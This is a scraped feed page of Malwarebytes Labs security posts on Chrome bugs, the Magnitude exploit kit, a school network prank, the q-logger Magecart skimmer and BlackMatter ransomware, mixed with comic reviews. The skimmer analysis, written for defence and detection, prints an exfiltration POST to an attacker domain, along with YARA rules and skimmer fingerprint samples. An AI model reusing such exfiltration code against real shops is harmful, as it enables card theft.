A buffer overflow is a type of software vulnerability that exists when a program writes more data into a buffer than the buffer was allocated to hold, so the excess spills into the adjacent memory region. The two memory areas most often targeted are the stack and the heap; in a heap overflow the neighbours are other heap objects and allocator metadata. By supplying specially crafted input, an attacker can use the overflow to overwrite memory they should not be able to reach, corrupting data or control structures that the program will later trust, which is how such bugs are turned into code execution.

Use after free

Use after free (UAF) is a vulnerability caused by incorrect handling of dynamically allocated memory during a program’s operation. If a program keeps using a pointer after the memory it refers to has been freed (a dangling pointer), an attacker who can arrange for that memory to be reallocated with contents they control can make the program operate on attacker-supplied data and manipulate its behaviour.

Skia

Skia is an open-source graphics library, written in C++, that abstracts away platform-specific graphics APIs. Google acquired it in 2005, and Chrome uses Skia for nearly all graphics operations, including text rendering.

Incognito

Incognito mode in Google Chrome, like the private modes in other browsers, is essentially a browser setting that stops local data about the websites you visit from being stored. When you browse in this mode, your browsing history is not recorded.

Dev Tools

Chrome DevTools is a set of web developer tools built directly into the Google Chrome browser. The Chrome DevTools are a set of web authoring and debugging tools that web developers can use to iterate, debug and profile their site.

V8

V8 is Google’s open source JavaScript and WebAssembly engine. It is the component that reads JavaScript and compiles it directly into machine code so that the CPU can run it, which is what allows scripts to execute while you browse. WebAssembly is a binary format that lets code written in languages other than JavaScript run on the web efficiently and securely; V8 handles that format as well.

PDFium

PDFium is Google’s open-source PDF rendering engine. It is used in Chrome to display PDFs and for print preview, and it is also used in Android for PDF rendering.

How to protect yourself

If you’re a Chrome user, you should update to version 95.0.4638.54 as soon as possible. Users of other Chromium browsers should be on the lookout for updates that fix the vulnerabilities they will have in common.

The easiest way to update Chrome is to allow Chrome to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then, and now would be a good time, given that several of these bugs allow code execution. My preferred method is to have Chrome open the page chrome://settings/help, which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

Stay safe, everyone!

The post Update now! Chrome fixes more security issues appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Chrome targeted by Magnitude exploit kit

Malwarebytes - Thu, 10/21/2021 - 12:47

Exploit kits (EK) are not as widespread as they used to be. One of the reasons is likely that most exploit kits targeted software that is hardly ever used anymore. Internet Explorer, Silverlight, and Flash Player to name a few, have been deprecated, replaced, and quickly lost their user-base.

So, just when you start thinking there is one less threat to worry much about, researchers have found an exploit kit with a keen interest in Chrome. Which, from a business point of view, makes a lot of sense, since Chrome is close to becoming not just a market leader, but almost a monopolist in the browser market.

Chrome has, at the time of writing, a market share of around 65%. The only other browser that reaches a market share that is over 10% is Safari. So if you are in the business of compromising browsers that visit your website or watch your advertisement, having Chrome users on your target list is a big plus.

Or, as Malwarebytes’ Director of Threat Intelligence, Jérôme Segura, put it:

“The future of exploit kits is via Chrome exploits. This could either be an anomaly or the beginning of a new era with big implications for the years to come.”

Magnitude EK

Enter the Magnitude exploit kit. Researchers have found that the Magnitude EK is actively using two vulnerabilities to exploit Chromium-based browsers. Magnitude is used in malvertising attacks to infect victims who visit compromised websites and its payload of choice is the Magniber ransomware.

The vulnerabilities

CVE-2021-21224 is described as a type confusion in V8 in Google Chrome prior to 90.0.4430.85 which allows a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. V8 is Google’s open source high-performance JavaScript and WebAssembly engine. This vulnerability was patched in April.

CVE-2021-31956 is a Windows NTFS Elevation of Privilege (EoP) vulnerability. This vulnerability can be used in combination with CVE-2021-21224 to escape the Chromium sandbox. This vulnerability was patched in June.

Practically the same combination of vulnerabilities was described in June when Microsoft fixed seven zero-days, including the CVE-2021-31956 we mentioned earlier. Back then, the attacker using these vulnerabilities was dubbed PuzzleMaker. At the time it was unknown which Chrome vulnerability was used by the attacker, but it’s highly likely that it was the same one Magnitude has now been found leveraging.

There is no malicious payload attached to the Magnitude exploits yet, the attack just exfiltrates the victim’s Windows build number. But reportedly, this is Magnitude EK’s standard procedure to test out new exploits, so this could change quickly if they start to see positive results.

How to protect yourself

It is only on rare occasions that we write about vulnerabilities and then tell you there isn’t much to worry about. But in this case, the only people that have anything to worry about are Windows users that browse the web using Chrome or Chromium-based browsers (like Edge), but have disabled its automatic updates and haven’t updated since April. You would also have to be running a Windows system that hasn’t been updated since June, or run Chrome with the --no-sandbox switch (not recommended). And even then all that would happen if you ran across the Magnitude EK (which usually focuses on South Korea) is getting fingerprinted.

But you do understand that you should update your OS and browser nonetheless, right?

Enable automatic updates

If you want to save yourself the trouble of manually installing updates, there are a few things you can do. For Google Chrome (under Windows) you can choose this page as one of the tabs that opens when you run the browser: chrome://settings/help. If there has been an update since the last time you closed your browser, this page will alert you and initiate a download of the update.

In Windows 10 you can select the Start button, then select Settings > Update & security > Windows Update. Select Advanced options, and then under Choose how updates are installed, select Automatic (recommended).

Stay safe, everyone!

The post Chrome targeted by Magnitude exploit kit appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Hearing the Owls Hoot in the Day Time

Sorcerer's Skull - Thu, 10/21/2021 - 11:00

Owls Hoot in the Day Time & Other Omens was the title of the 2003 collection of Manly Wade Wellman's John the Balladeer/Silver John stories from Night Shade Books. I have long been a fan of these Appalachian-centered fantasy stories (they were an influence on Weird Adventures). Recently I bought the audiobook of this collection for a work trip. I probably haven't read these stories in nearly 20 years, so it was fun to revisit them, and the narrator is just right for the material.

High school student rickrolls entire school district, and gets praised

Malwarebytes - Wed, 10/20/2021 - 16:04

A student at a high school in Cook County successfully hacked into the Internet-of-Things (IoT) devices of one of the largest school districts in Illinois, and gave everyone a surprise.

Minh (aka @WhiteHoodHacker on Twitter) who attends Elk Grove—a name that curiously resembles the home town of legendary anti-hero, Ash Williams—rickrolled the entire Township High School District 214.

In case you don’t know, rickrolling is an internet meme and a type of bait and switch prank wherein people are expecting one thing (clicking a link, for example) but instead are shown a clip of the 1987 song “Never Gonna Give You Up” by Rick Astley instead.

The end-result of Minh’s work, captured by Minh’s brother

“This story isn’t one of those typical rickrolls where students sneak Rick Astley into presentations, talent shows, or Zoom calls,” Minh writes in his personal blog, “I did it by hijacking every networked display in every school to broadcast ‘Never Gonna Give You Up’ in perfect synchronization. Whether it was a TV in a hall, a projector in a classroom, or a jumbotron displaying the lunch menu, as long as it was networked, I hacked it!”

In the post, Minh further revealed that everything started during his freshman year, a time he admitted was “the beginning of my script kiddie phase”. With the help of friends, he was able to scan and find more than 8 million IPs in the internal district network. With that many IPs, he was bound to find devices that were exposed—and he certainly did.

Here’s young Minh, staring back at himself from a security camera he was able to access remotely from his iPad. When informed about this, the district placed camera access behind an access control list (ACL).

Security cameras weren’t the only devices exposed to the student network. Minh was also able to have complete access to the district’s Internet Protocol Television (IPTV) system, a system that delivers multimedia content over IP-based networks. However, he wasn’t able to pull off the school prank he’d been planning until three years later.

Minh called his rickrolling operation “The Big Rick”. Here’s the timeline of events that fateful day.

Thanks to scheduling changes schools had to introduce in response to COVID-19 restrictions, Minh and his crew were able to pull off their scheme while avoiding disrupting classes and—yikes!—significant tests. Minh also said that they were prepared to abort the operation if they found that tests were taking place.

Once Minh had finished his prank, he sent a pentest report to the district’s technical supervisors.

“A few days after sending the report through the anonymous email account, we received an email response from D214’s Director of Technology,” Minh continued in his blog, “The director stated that because of our guidelines and documentation, the district would not be pursuing discipline. In fact, he thanked us for our findings and wanted us to present a debrief to the tech team! Later, he revealed the superintendents themselves reviewed and were impressed by our report!”

This is not a typical response from an organization when someone steps forward to show them their technological vulnerabilities. Many in the cybersecurity and tech industries know someone—or have themselves experienced—getting burned by groups or individuals for simply letting them know about what’s wrong with their systems and what they can do better. Let us not forget those two physical penetration testers getting arrested and jailed for doing a job they were hired to do.

Of course, something like this could happen even when there’s support for a bug bounty program. Take, for example, the case of drone-maker, DJI, who offered a bug bounty program but then decided to modify the terms of its scope and attack the security researcher who found major flaws in its product.

It’s no surprise, then, to see that Minh’s peers expressed distrust of the D214 administration, even though the latter was open to working with him and his crew to remediate and audit the problems.

“We decided I would reveal myself to present our debrief slides with the others remaining anonymous in the Zoom meeting,” Minh continues, “I had planned on announcing my involvement from the beginning since I wanted to publish this blog post. (I was also pretty much the prime suspect anyways.) But, just in case, I scheduled the debrief to take place after I graduated.”

At the end of the day, everything went “extremely well” for everyone involved. Suffice to say, Minh and his crew were one of the lucky ones to belong to a district that is objective enough to see past the prank and focus on the underlying technological vulnerabilities that made it possible to begin with.

The district has also displayed a stance that potentially opens great cybersecurity opportunities not only to Minh and his crew but also to those who aspire to do what they have done in the name of vulnerability disclosure (sans the pranks, of course). This is something that the industry welcomes and what is urgently needed.

“This has been one of the most remarkable experiences I ever had in high school and I thank everyone who helped support me,” Minh concluded.

Let us be the first to say that this fine lady is not the only one doing the happy dance.

(Video by nitw_t on YouTube)

* Image header is taken by Tom Tran

The post High school student rickrolls entire school district, and gets praised appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to delete your Snapchat account

Malwarebytes - Wed, 10/20/2021 - 14:12

Snapchat is an instant messaging app popular with youngsters that allows users to send pictures and videos that are only viewable for short periods.

But while hundreds of millions of daily active users consume and create content with Snapchat, not everyone is pleased with the mobile app.

One of the most significant concerns with Snapchat is that a recipient can record snaps without a creator’s knowledge or consent. And although Snapchat does notify a sender when a recipient takes a screenshot or records a video through proprietary software, some apps allow recipients to circumvent these checks.

If you no longer want to keep your Snapchat account, you can choose to delete it.

How to deactivate your Snapchat account

You may want to deactivate your Snapchat if you just want a break from the app. Currently, there’s no direct way to disable your account temporarily. The only way to deactivate Snapchat is to delete it.

After you delete your Snapchat, the platform gives you 30 days to change your mind before deleting your account permanently. So, to temporarily deactivate your Snapchat, you could cancel the deletion process before the 30-day period ends.

What happens if you delete your Snapchat account?

The instant you complete the Snapchat deletion process, an invisible 30-day timer starts. You now have just over four weeks to change your mind. After 30 days, Snapchat deletes the following data from its database:

  • Account
  • Account settings
  • Friends
  • Snaps
  • Chats
  • Story
  • Device data
  • Location data

According to Snapchat, some of your personal information may remain in the database for “certain legal, security and business needs.”

How to reactivate your Snapchat account

Reactivating your Snapchat account is pretty simple as long as you are still within the 30-day deletion window. Start your Snapchat app and log back in with your credentials. It may take up to 24 hours to reactivate your account.

How to download your Snapchat data

Your Snapchat data carries your login history, account information, profiles, snap and chat history, memories, friends, search history, Bitmoji, and more. You can download your Snapchat data before you delete your account to preserve the information.

  1. Go to accounts.snapchat.com
  2. Log into your account.
  3. Click My Data and then click Submit Request.
  4. You’ll receive a download link to your verified Snapchat email address.
  5. Use the link to download your data.

How to delete your Snapchat account

  1. Go to accounts.snapchat.com
  2. Log into your account.
  3. Scroll down until you see Delete My Account on the Manage My Account page.
  4. Click Delete My Account.
  5. Enter your username and password to confirm.
  6. Click Continue to start the process.
  7. Don’t log into the app again.
  8. Your Snapchat account will be deleted permanently in 30 days.

Can you reactivate your Snapchat account after 30 days?

You won’t be able to log back into your account 30 days after starting the deletion process. However, you can create a new Snapchat account after your old one has expired.

How to protect yourself on social media

Maybe deleting Snapchat is one step too far for you at the moment. If that’s the case, there are steps you can take to help protect yourself while using Snapchat, and any other social media platforms.

Follow our selfie security measures to help prevent your sensitive media from getting into an abuser’s hands. Also avoid these six social media safety sins to help stay secure.

Setting a strong password is also advisable, and make sure each online account you have has a different password. Familiarise yourself with phishing attempts on mobile phones, to lessen the likelihood of you falling for a scam. Lastly, use security for your Android or iOS device to protect against stalkerware and online stalking incidents.

The post How to delete your Snapchat account appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Wednesday Comics: DC, January 1980 (wk 2, pt 1)

Sorcerer's Skull - Wed, 10/20/2021 - 11:00
My goal: read DC Comics' output from January 1980 (cover date) to Crisis! This week, I'm looking at the comics at newsstands around October 23, 1980.

Action Comics #515: Wolfman's story here is an interesting alternate history of the sort the X-Men would do a lot in the 80s (in fact, X-Men #141, "Days of Future Past" is out this same week!). We see a world where Vandal Savage is the absolute ruler and Superman is his dedicated enforcer, completely convinced of Savage's beneficence, until undercover rebel agents Lois Lane and Perry White make him see the light. The issue ends with Superman vowing to make Savage pay. It's odd seeing the very Silver Age Curt Swan drawing this sort of "modern" story.
In the Atom backup by Rozakis and Saviuk, an agent of cosmic balance named Mallo (who is drawn so mundanely and specifically, I feel like he has to be a reference to someone but I don't know who) is worried that having an Earth-1 and Earth-2 Atom without the same powers will somehow cause a problematic imbalance. So he switches the Atoms' powers, and Ray Palmer has to go through the issue just being tough and not having shrinking powers. At the end of the issue, Mallo restores Palmer's usual powers and plugs the upcoming "Whatever Happened to the Earth-Two Atom?" feature. This story is logically flawed and a bit silly, but it didn't bore me, which is a win for a backup.

Brave & the Bold #170: Burkett and Aparo bring Batman together with Nemesis, probably to try to build interest in the character who's going to return to the backup feature after this. Nemesis and Batman get to the top of the organization that killed his friend and brainwashed his brother to do the killing. It turns out Head is a guy in an iron lung. Nemesis wants to kill him, but Batman convinces him not to. Still, a dying Nazi scientist does the job. The story has a nice moment where Batman is examining with professional admiration the quality of one of the masks Nemesis uses as a disguise.

Detective Comics #498: The Conway and Newton/Adkins main story starts out a little confusingly as it is a direct sequel to a story from 1979, but they don't tell you that until a few pages in. After his last encounter with Batman, Blockbuster falls into the ocean and is presumed dead. After washing up on a beach, he walks to Bleak Rock, West Virginia, for some reason, where he gets involved in the struggle of miners against a corrupt union boss. Batman has been looking for Blockbuster to show up (perhaps a bit guilty over his death) and flies to West Virginia. He is promptly hit in the back of the head by a goon and thrown into a mine. He's found there by Blockbuster, who starts to get enraged and wants to kill him. To be continued!
The backup continues the "Barbara Gordon--Murderer" storyline by Burkett, Delbo and Giella. Commissioner Gordon is back to bail Barbara out of jail and the lawyer she's friendly with agrees to represent her, but she doesn't have much time to clear her name--unless she wants to reveal that she's Batgirl. The prosecution has an invoice signed by her for the poison that killed the Congressman, so Barbara knows her administrative assistant must be in on it. She visits her as Batgirl, and the woman admits the part she played, but she didn't want Barbara to go to jail, only to leverage Commissioner Gordon into letting her brother out of jail. She now knows she was duped. Before Barbara can do anything with this information, thugs bust in, and she is knocked out in the ensuing fight. This continues to be a decent storyline.

Green Lantern #136: There's a lot going on in this Wolfman/Staton yarn. Trying to find out what happened to Carol Ferris, Green Lantern and Tom seek out Bruce Gordon who was at Ferris Aircraft the day of the bombing. Bruce Gordon is Eclipso, though, so a fight breaks out that leads to the collapse of the building. As GL flies to save Tom, he is transported away to a future Earth under siege by the Gordanians. The time jump has left him without his memory. The Space Ranger breaks him out of the hospital to enlist his further aid against the invaders. They manage to find a green lantern in an old weapon cache, so Jordan can recharge. Unfortunately, the Gordanians defeat them all and take them captive. While (well, not really since she's in the past, but you know what I mean) all this is going on, Carol is being hunted Most Dangerous Game-style.
Unsurprisingly, the Adam Strange backup by Sutton and Rodriguez is less interesting than the main feature. There's a sort of planetary Olympics going on on Rann. Strange is competing, but the contests keep getting won by the same stranger in suspicious circumstances. Strange figures out the guy is somehow solar powered and confronts him. It turns out he's a shape-shifted alien who for some reason thinks he will conquer Rann by winning the contest, but when Adam Strange defeats him in one on one combat his species gives up the attempted conquest.

House of Mystery #288: The "cover story" here is a riff on "The Ones Who Walk Away from Omelas" by DeMatteis and Speigle. A skeleton in a top hat playing a bone flute shows up in an idyllic town once a year to lead away some mentally challenged townsperson. A young man is determined to get his friend back and tracks the Piper to a cave where he is torturing the man he took away. The Piper shows the young hero the River of Souls, where the dark elements of human nature are held--and kept away from the town--so long as they give up one innocent soul a year to be tortured and corrupted by the Piper. Our hero attacks the Piper to free his friend, then the River of Souls is released. The town begins to destroy itself in a frenzy of concentrated badness. Our hero's uncle joins him and the former victim in leaving town. He explains as they go that he had once confronted the Piper over the hero's father but had been too frightened to do anything after seeing the River.
The other stories aren't as good. Barr and Jodloman deliver a short story about a big game hunter shooting a guide in an argument over shooting an endangered wolf, but then it turns out the guide is a werewolf. "Blood in Sand" is a weird story by Gwyon and Redondo about a young matador who wants to win enough to pay the rent on his mother's grave, but his girl's unhappy with the dangerousness of his chosen profession. She's also being pursued by the wealthy bull breeder. An old wise woman warns the matador that the next bull he fights will not be as normal bulls, but he doesn't quite believe her. In the arena though, he realizes his rival's spirit is somehow guiding the bull. He manages to kill it but dies in the process. No one pays the rent on his mom's grave or his grave, Cain helpfully informs us. The last story by Kanigher and Cruz is a tale of doomed love and jealousy in an Irish fishing community, and is the sort of bland stuff I expect from Ghosts.

Unknown Soldier #247: Haney and Ayers and Tlaloc have the Soldier infiltrating the Warsaw Ghetto to get information from a Jewish scientist whose "gas diffusion" work will aid the development of the atomic bomb. The old man is dying, but he will only give up the information if the Soldier takes his granddaughter out of the Ghetto. They are on their way out, but they're captured by Jewish resistance fighters who at first think the Soldier is a Nazi spy, but won't let them go even after they find out otherwise, fearing that under torture the girl would give away their hiding place. One of the fighters helps them escape into the sewers for the promise of a lot of money, but a German patrol nabs them. The cowardly fighter turns traitor, but the Soldier stuffs a cyanide pill in the guy's mouth! He and the girl get away, hiding in a wagon of corpses being removed from the ghetto. Outside, they are again caught by German troops, but the Soldier fakes a heart attack to grab a soldier's rifle. With help from the resistance fighters on the walls, they kill the squad, and he and the girl make good their escape.
Kanigher and Mandrake follow that up with a tale of ancient Greece. After the Battle of Thermopylae, a brave shepherd boy kills a Persian commander. The coda remarks that the Persians are now called Iranians and suggests the possibility that their "fanatical leader" might fall to a single blow from a defiant boy. The last story by Burkett and Ayers/Celardo continues the travails of the "Ruptured Duck" from last issue, where the old, worn out plane keeps somehow saving folks' lives--and still breaking down a lot. Part one seemed kind of pointless and part two definitely was.

q-logger skimmer keeps Magecart attacks going

Malwarebytes - Tue, 10/19/2021 - 20:59

This blog post was authored by Jérôme Segura

Although global e-commerce is continuing to grow rapidly, it seems as though Magecart attacks via digital skimmers have not followed the same trend. This is certainly true if we only look at recent newsworthy attacks; indeed when a victim is a large business or popular brand we typically are more likely to remember it.

From a research standpoint, we have observed certain shifts in the scope of attacks. For instance, the different threat actors are continuing to expand and diversify their methods and infrastructure. In a blog post about Magecart Group 8, we documented some of the various web properties used to serve skimmers and exfiltrate stolen data.

But at the end of the day, we only know about attacks that we can see, that is until we discover more. Case in point, one particular skimmer identified as q-logger, has been active for several months. But it wasn’t until we started digging further that we realized how much bigger it was.

Q-logger origins

This skimmer was originally flagged by Eric Brandel as q-logger. Depending on how much you enjoy parsing JavaScript you may have a love/hate relationship with it. The code is dense and using an obfuscator that is as generic as can be, making identification using signatures challenging.

Thanks to some data from @sansecio I've come across a new(?) digital skimmer/#magecart I call "q-logger". It has a variety of features, the most peculiar may be the secondary keylogger it uses to try and defend against inspection. 1/16 pic.twitter.com/ME80KMrNg5

— Eric Brandel (@AffableKraut) April 22, 2021

This skimmer can be found loaded directly into compromised e-commerce sites. However, in the majority of cases we found it loaded externally.

The loader

The loader is also an encoded piece of JavaScript that is somewhat obscure. It is injected inline within the DOM right before the text/x-magento-init tag or separated by copious amounts of white space.

One way to understand what the code does is by using a debugger and setting a breakpoint at a particular spot. It is best to either use an already compromised site or bypass the check for the address bar (onestepcheckout).

We can now see the purpose of this script: it is to load the proper skimmer.

The skimmer

As mentioned previously, the skimmer is quite opaque and makes debugging effort difficult and lengthy.

To cut to the chase, the skimmer exfiltrates data via a POST request to the same domain name where the JavaScript is loaded from.

POST https://filltobill5.casa/ HTTP/1.1
Host: filltobill5.casa
[obfuscated data]

Threat actor and victims

We were able to collect a few indicators from the threat actor behind this campaign. One was the use of netmail.tk, also observed by Luke Leal, for registering skimmer domains.

Although there are clusters of domains from the same registrant, we see that they are trying to compartmentalize their infrastructure and hide the hosting provider’s true IP address. They also register domains en masse, which allows them to defeat traditional blocklists.

We don’t have a good estimate of how prevalent this campaign is, but we certainly run into it regularly while monitoring e-commerce sites for malicious code. The victims are various small businesses with an online shop running Magento.


The large number of e-commerce sites that are running outdated versions of their CMS is a low hanging fruit for threat actors interested in stealing credit card data. In a sense, there is always a baseline of potential victims that can be harvested.

And every now and again, some opportunities appear. They could be as simple as a zero-day in a plugin or CMS, or maybe an entry point into more valuable targets via a supply-chain attack.

Threat actors are always ready to pounce on those and may well have established their infrastructure ahead of time, waiting for such opportunities.

Malwarebytes customers are protected against this skimmer.

Indicators of Compromise

Email addresses (registrant)

  • wxugvvvu@netmail[.]tk
  • isgskpys@netmail[.]tk
  • zulhqmnr@netmail[.]tk
  • yzzljjkmc@emlhub[.]com
  • foyiy11183@macosnine[.]com

Skimmer domains

Skimmer URLs

YARA rules

rule qlogger_loader_WebSkimmer : Magecart WebSkimmer {
    meta:
        author = "Malwarebytes"
        description = "Magecart (q-logger loader)"
        source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/"
        date = "2021-10-19"
    strings:
        $regex = /"load",function\(\)\{\(function\(\)\{/
        $regex2 = /while\(!!\[\]\)\{try{var/
        $regex3 = /\(\w\['shift'\]\(\)\);\}\}\}/
    condition:
        all of them
}

rule qlogger_skimmer_WebSkimmer : Magecart WebSkimmer {
    meta:
        author = "Malwarebytes"
        description = "Magecart (q-logger skimmer)"
        source = "https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/"
        date = "2021-10-19"
    strings:
        $regex = /return\(!!window\[\w{2}\(/
        $regex2 = /\w\(\)&&console\[/
    condition:
        all of them
}
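
The two YARA rules above, together with the injection point described under “The loader” (an inline script right before the text/x-magento-init tag), can be applied offline to a saved copy of a shop page. The following Python scanner is an added example, not Malwarebytes’ tooling: it transcribes the rule regexes, applies each rule’s “all of them” condition per script block, and additionally flags any inline script that sits directly before a text/x-magento-init block; the SAMPLE_HTML, its script paths and identifiers are constructed for the demo and are not the real skimmer.

```python
"""Scan a captured Magento page for q-logger loader/skimmer fingerprints."""
import re
from typing import Dict, List, Pattern

# Patterns transcribed from the two YARA rules in the post. Python's re dialect
# accepts them unchanged apart from escaping the literal '{' in 'try{var'.
RULES: Dict[str, List[Pattern[str]]] = {
    "qlogger_loader_WebSkimmer": [
        re.compile(r'"load",function\(\)\{\(function\(\)\{'),
        re.compile(r"while\(!!\[\]\)\{try\{var"),
        re.compile(r"\(\w\['shift'\]\(\)\);\}\}\}"),
    ],
    "qlogger_skimmer_WebSkimmer": [
        re.compile(r"return\(!!window\[\w{2}\("),
        re.compile(r"\w\(\)&&console\["),
    ],
}

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
TYPE_RE = re.compile(r"""\btype\s*=\s*["']?([^"'\s>]+)""", re.I)
SRC_RE = re.compile(r"\bsrc\s*=", re.I)
MAGENTO_INIT = "text/x-magento-init"


def match_rules(js: str) -> List[str]:
    """Names of the rules whose patterns *all* match (YARA 'all of them')."""
    return [name for name, pats in RULES.items() if all(p.search(js) for p in pats)]


def scan_html(html: str) -> List[dict]:
    """Report script blocks that match a rule or sit where the loader is injected.

    Placement heuristic from the post: an inline script (no src attribute)
    followed, with nothing but whitespace in between, by a text/x-magento-init
    block is reported even when no signature fires, so a re-obfuscated loader
    still surfaces for manual review (legitimate inline scripts in that spot
    will show up too; the rule hits tell the two apart).
    """
    scripts = list(SCRIPT_RE.finditer(html))
    findings = []
    for i, m in enumerate(scripts):
        attrs, body = m.group(1), m.group(2)
        hits = match_rules(body)
        before_init = False
        if i + 1 < len(scripts) and not SRC_RE.search(attrs):
            nxt = scripts[i + 1]
            nxt_type = TYPE_RE.search(nxt.group(1))
            gap = html[m.end():nxt.start()]
            before_init = bool(
                nxt_type
                and nxt_type.group(1).lower() == MAGENTO_INIT
                and gap.strip() == ""
            )
        if hits or before_init:
            findings.append({
                "index": i,
                "offset": m.start(),
                "rules": hits,
                "before_magento_init": before_init,
            })
    return findings


# Constructed sample page (not a real skimmer): a theme script, a block that
# carries the loader fingerprints, a Magento init block, and a block that
# carries the skimmer fingerprints.
SAMPLE_HTML = """<html><head>
<script src="/static/frontend/Magento/luma/en_US/mage/app.js"></script>
<script>
window.addEventListener("load",function(){(function(){var q=["x"];
while(!![]){try{var r=(q['shift']());}}}catch(e){}})();});
</script>


<script type="text/x-magento-init">
{"*": {"Magento_Ui/js/core/app": {"components": {}}}}
</script>
<script>
function c(){return(!!window[ab(0x1)]);}
if(c()&&console[ab(0x2)]){}
</script>
</head><body></body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f)
```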

The post q-logger skimmer keeps Magecart attacks going appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Protect yourself from BlackMatter ransomware: Advice issued

Malwarebytes - Tue, 10/19/2021 - 16:33

Despite promises made by the BlackMatter ransomware gang about which organizations and business types they would avoid, multiple US critical infrastructure entities have been targeted. Now, the Federal Bureau of Investigation (FBI), in conjunction with the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA) have issued a warning on BlackMatter ransomware, and tips on how to avoid it.

BlackMatter ransomware

BlackMatter is a ransomware-as-a-service (RaaS) that allows the developers to profit from cybercriminal affiliates who deploy it against victims. BlackMatter is a possible rebrand of DarkSide, and has some similarities to REvil. According to its own site:

 “The project has incorporated in itself the best features of DarkSide, REvil and LockBit”

Promises, promises

On their own leak site, the BlackMatter gang claim not to attack companies belonging to the following six industries, with the caveat that if or when any companies in these industries do get hit, such victims should simply ask for a free decryption:

  • Hospitals
  • Critical infrastructure facilities (nuclear power plants, power plants, water treatment facilities)
  • Oil and gas industry (pipelines, oil refineries)
  • Defense industry
  • Non-profit companies
  • Government sector

A recent high-profile victim of BlackMatter was Japan-headquartered manufacturer Olympus which, among others, produces medical equipment. BlackMatter is also named as the likely culprit behind the cybersecurity incident affecting US farmers’ cooperative NEW Cooperative.

All in all, the BlackMatter group have performed attacks against several US-based organizations and demanded ransoms ranging from 80 thousand to 15 million US dollars in Bitcoin and Monero.

How to avoid BlackMatter ransomware

The CISA alert lists technical details in the form of Tactics, Techniques, and Procedures (TTPs) based on the MITRE ATT&CK for Enterprise framework, detection signatures, and mitigations.

Most of the mitigation strategies will look very familiar to our regular readers, but it’s always worth repeating them. And you may spot some new ones.

  • Use strong and unique passwords. Passwords shouldn’t be reused across multiple accounts or stored on a system where an adversary may gain access. Devices with local administrative accounts should implement a password policy that requires strong, unique passwords for each individual administrative account.
  • Implement and require Multi-Factor Authentication (MFA) where possible and especially for webmail, virtual private networks, and accounts that access critical systems.
  • Patch and update. Keep all operating systems and software up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats.
  • Limit access to resources over the network. Remove unnecessary access to administrative shares, restrict privileges to only the necessary service or user accounts and perform continuous monitoring for anomalous activity. Use a host-based firewall to only allow connections to administrative shares via Server Message Block (SMB) from a limited set of administrator machines.
  • Implement network segmentation and traversal monitoring. This will hinder an adversary from learning the organization’s enterprise environment. Many attackers use system and network discovery techniques for network and system mapping.
  • Implement time-based access for accounts set at the admin-level and higher. BlackMatter operatives have been noticed to use compromised credentials during non-business hours, which allows them to go undetected for longer periods.
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities that run from the command line.
  • Implement and enforce backup and restoration policies and procedures. Doing backups right is not as easy as some may think. Make sure they are recent, cannot be altered or deleted, and cover the entire organization’s data infrastructure.

Furthermore, CISA, the FBI, and NSA urge critical infrastructure organizations to apply the following additional mitigations to reduce the risk of credential compromise:

  • Disable the storage of clear text passwords in LSASS memory.
  • Consider disabling or limiting New Technology Local Area Network Manager (NTLM) and WDigest Authentication.
  • Implement Credential Guard for Windows 10 and Server 2016.
  • Minimize the Active Directory (AD) attack surface to reduce malicious ticket-granting activity. Ticket Granting services can be used to obtain hashed credentials that attackers attempt to crack or use in pass-the-hash methods.
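
As an added example (not part of the advisory or this post), the following Python audit maps the credential mitigations listed above to the Windows registry values that implement them and reports whether each setting on a host is hardened. The key paths and value names are the standard Windows locations; the values treated as hardened are assumptions stated in the comments, and reading the live registry requires running it on the Windows host itself.

```python
"""Audit LSASS/NTLM credential-hardening settings on a Windows host."""
import sys
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Setting:
    name: str                  # mitigation from the advisory
    key: str                   # subkey under HKEY_LOCAL_MACHINE
    value: str                 # DWORD value name
    hardened: Tuple[int, ...]  # values accepted as hardened (assumption)


CHECKS: List[Setting] = [
    # Clear-text passwords in LSASS memory come from the WDigest provider;
    # 0 stops it caching them.
    Setting("WDigest keeps no clear-text credentials in LSASS memory",
            r"SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest",
            "UseLogonCredential", (0,)),
    # 1 = LSASS as a protected process with UEFI lock, 2 = without lock.
    Setting("LSASS runs as a protected process (RunAsPPL)",
            r"SYSTEM\CurrentControlSet\Control\Lsa", "RunAsPPL", (1, 2)),
    # 5 = send NTLMv2 only, refuse LM and NTLMv1 ("limit NTLM").
    Setting("NTLMv2 only, LM and NTLMv1 refused (LmCompatibilityLevel)",
            r"SYSTEM\CurrentControlSet\Control\Lsa", "LmCompatibilityLevel", (5,)),
    # 2 = deny all outgoing NTLM ("disable NTLM"); test first, it breaks
    # legacy clients and workgroup shares that only speak NTLM.
    Setting("Outgoing NTLM to remote servers denied (RestrictSendingNTLMTraffic)",
            r"SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0",
            "RestrictSendingNTLMTraffic", (2,)),
    # Credential Guard configured: 1 = with UEFI lock, 2 = without lock.
    Setting("Credential Guard configured (LsaCfgFlags)",
            r"SYSTEM\CurrentControlSet\Control\Lsa", "LsaCfgFlags", (1, 2)),
]


def setting_id(s: Setting) -> str:
    return f"{s.key}\\{s.value}"


def evaluate(observed: Dict[str, Optional[int]]) -> List[dict]:
    """Classify each check from a map of setting_id -> DWORD (None = absent)."""
    rows = []
    for s in CHECKS:
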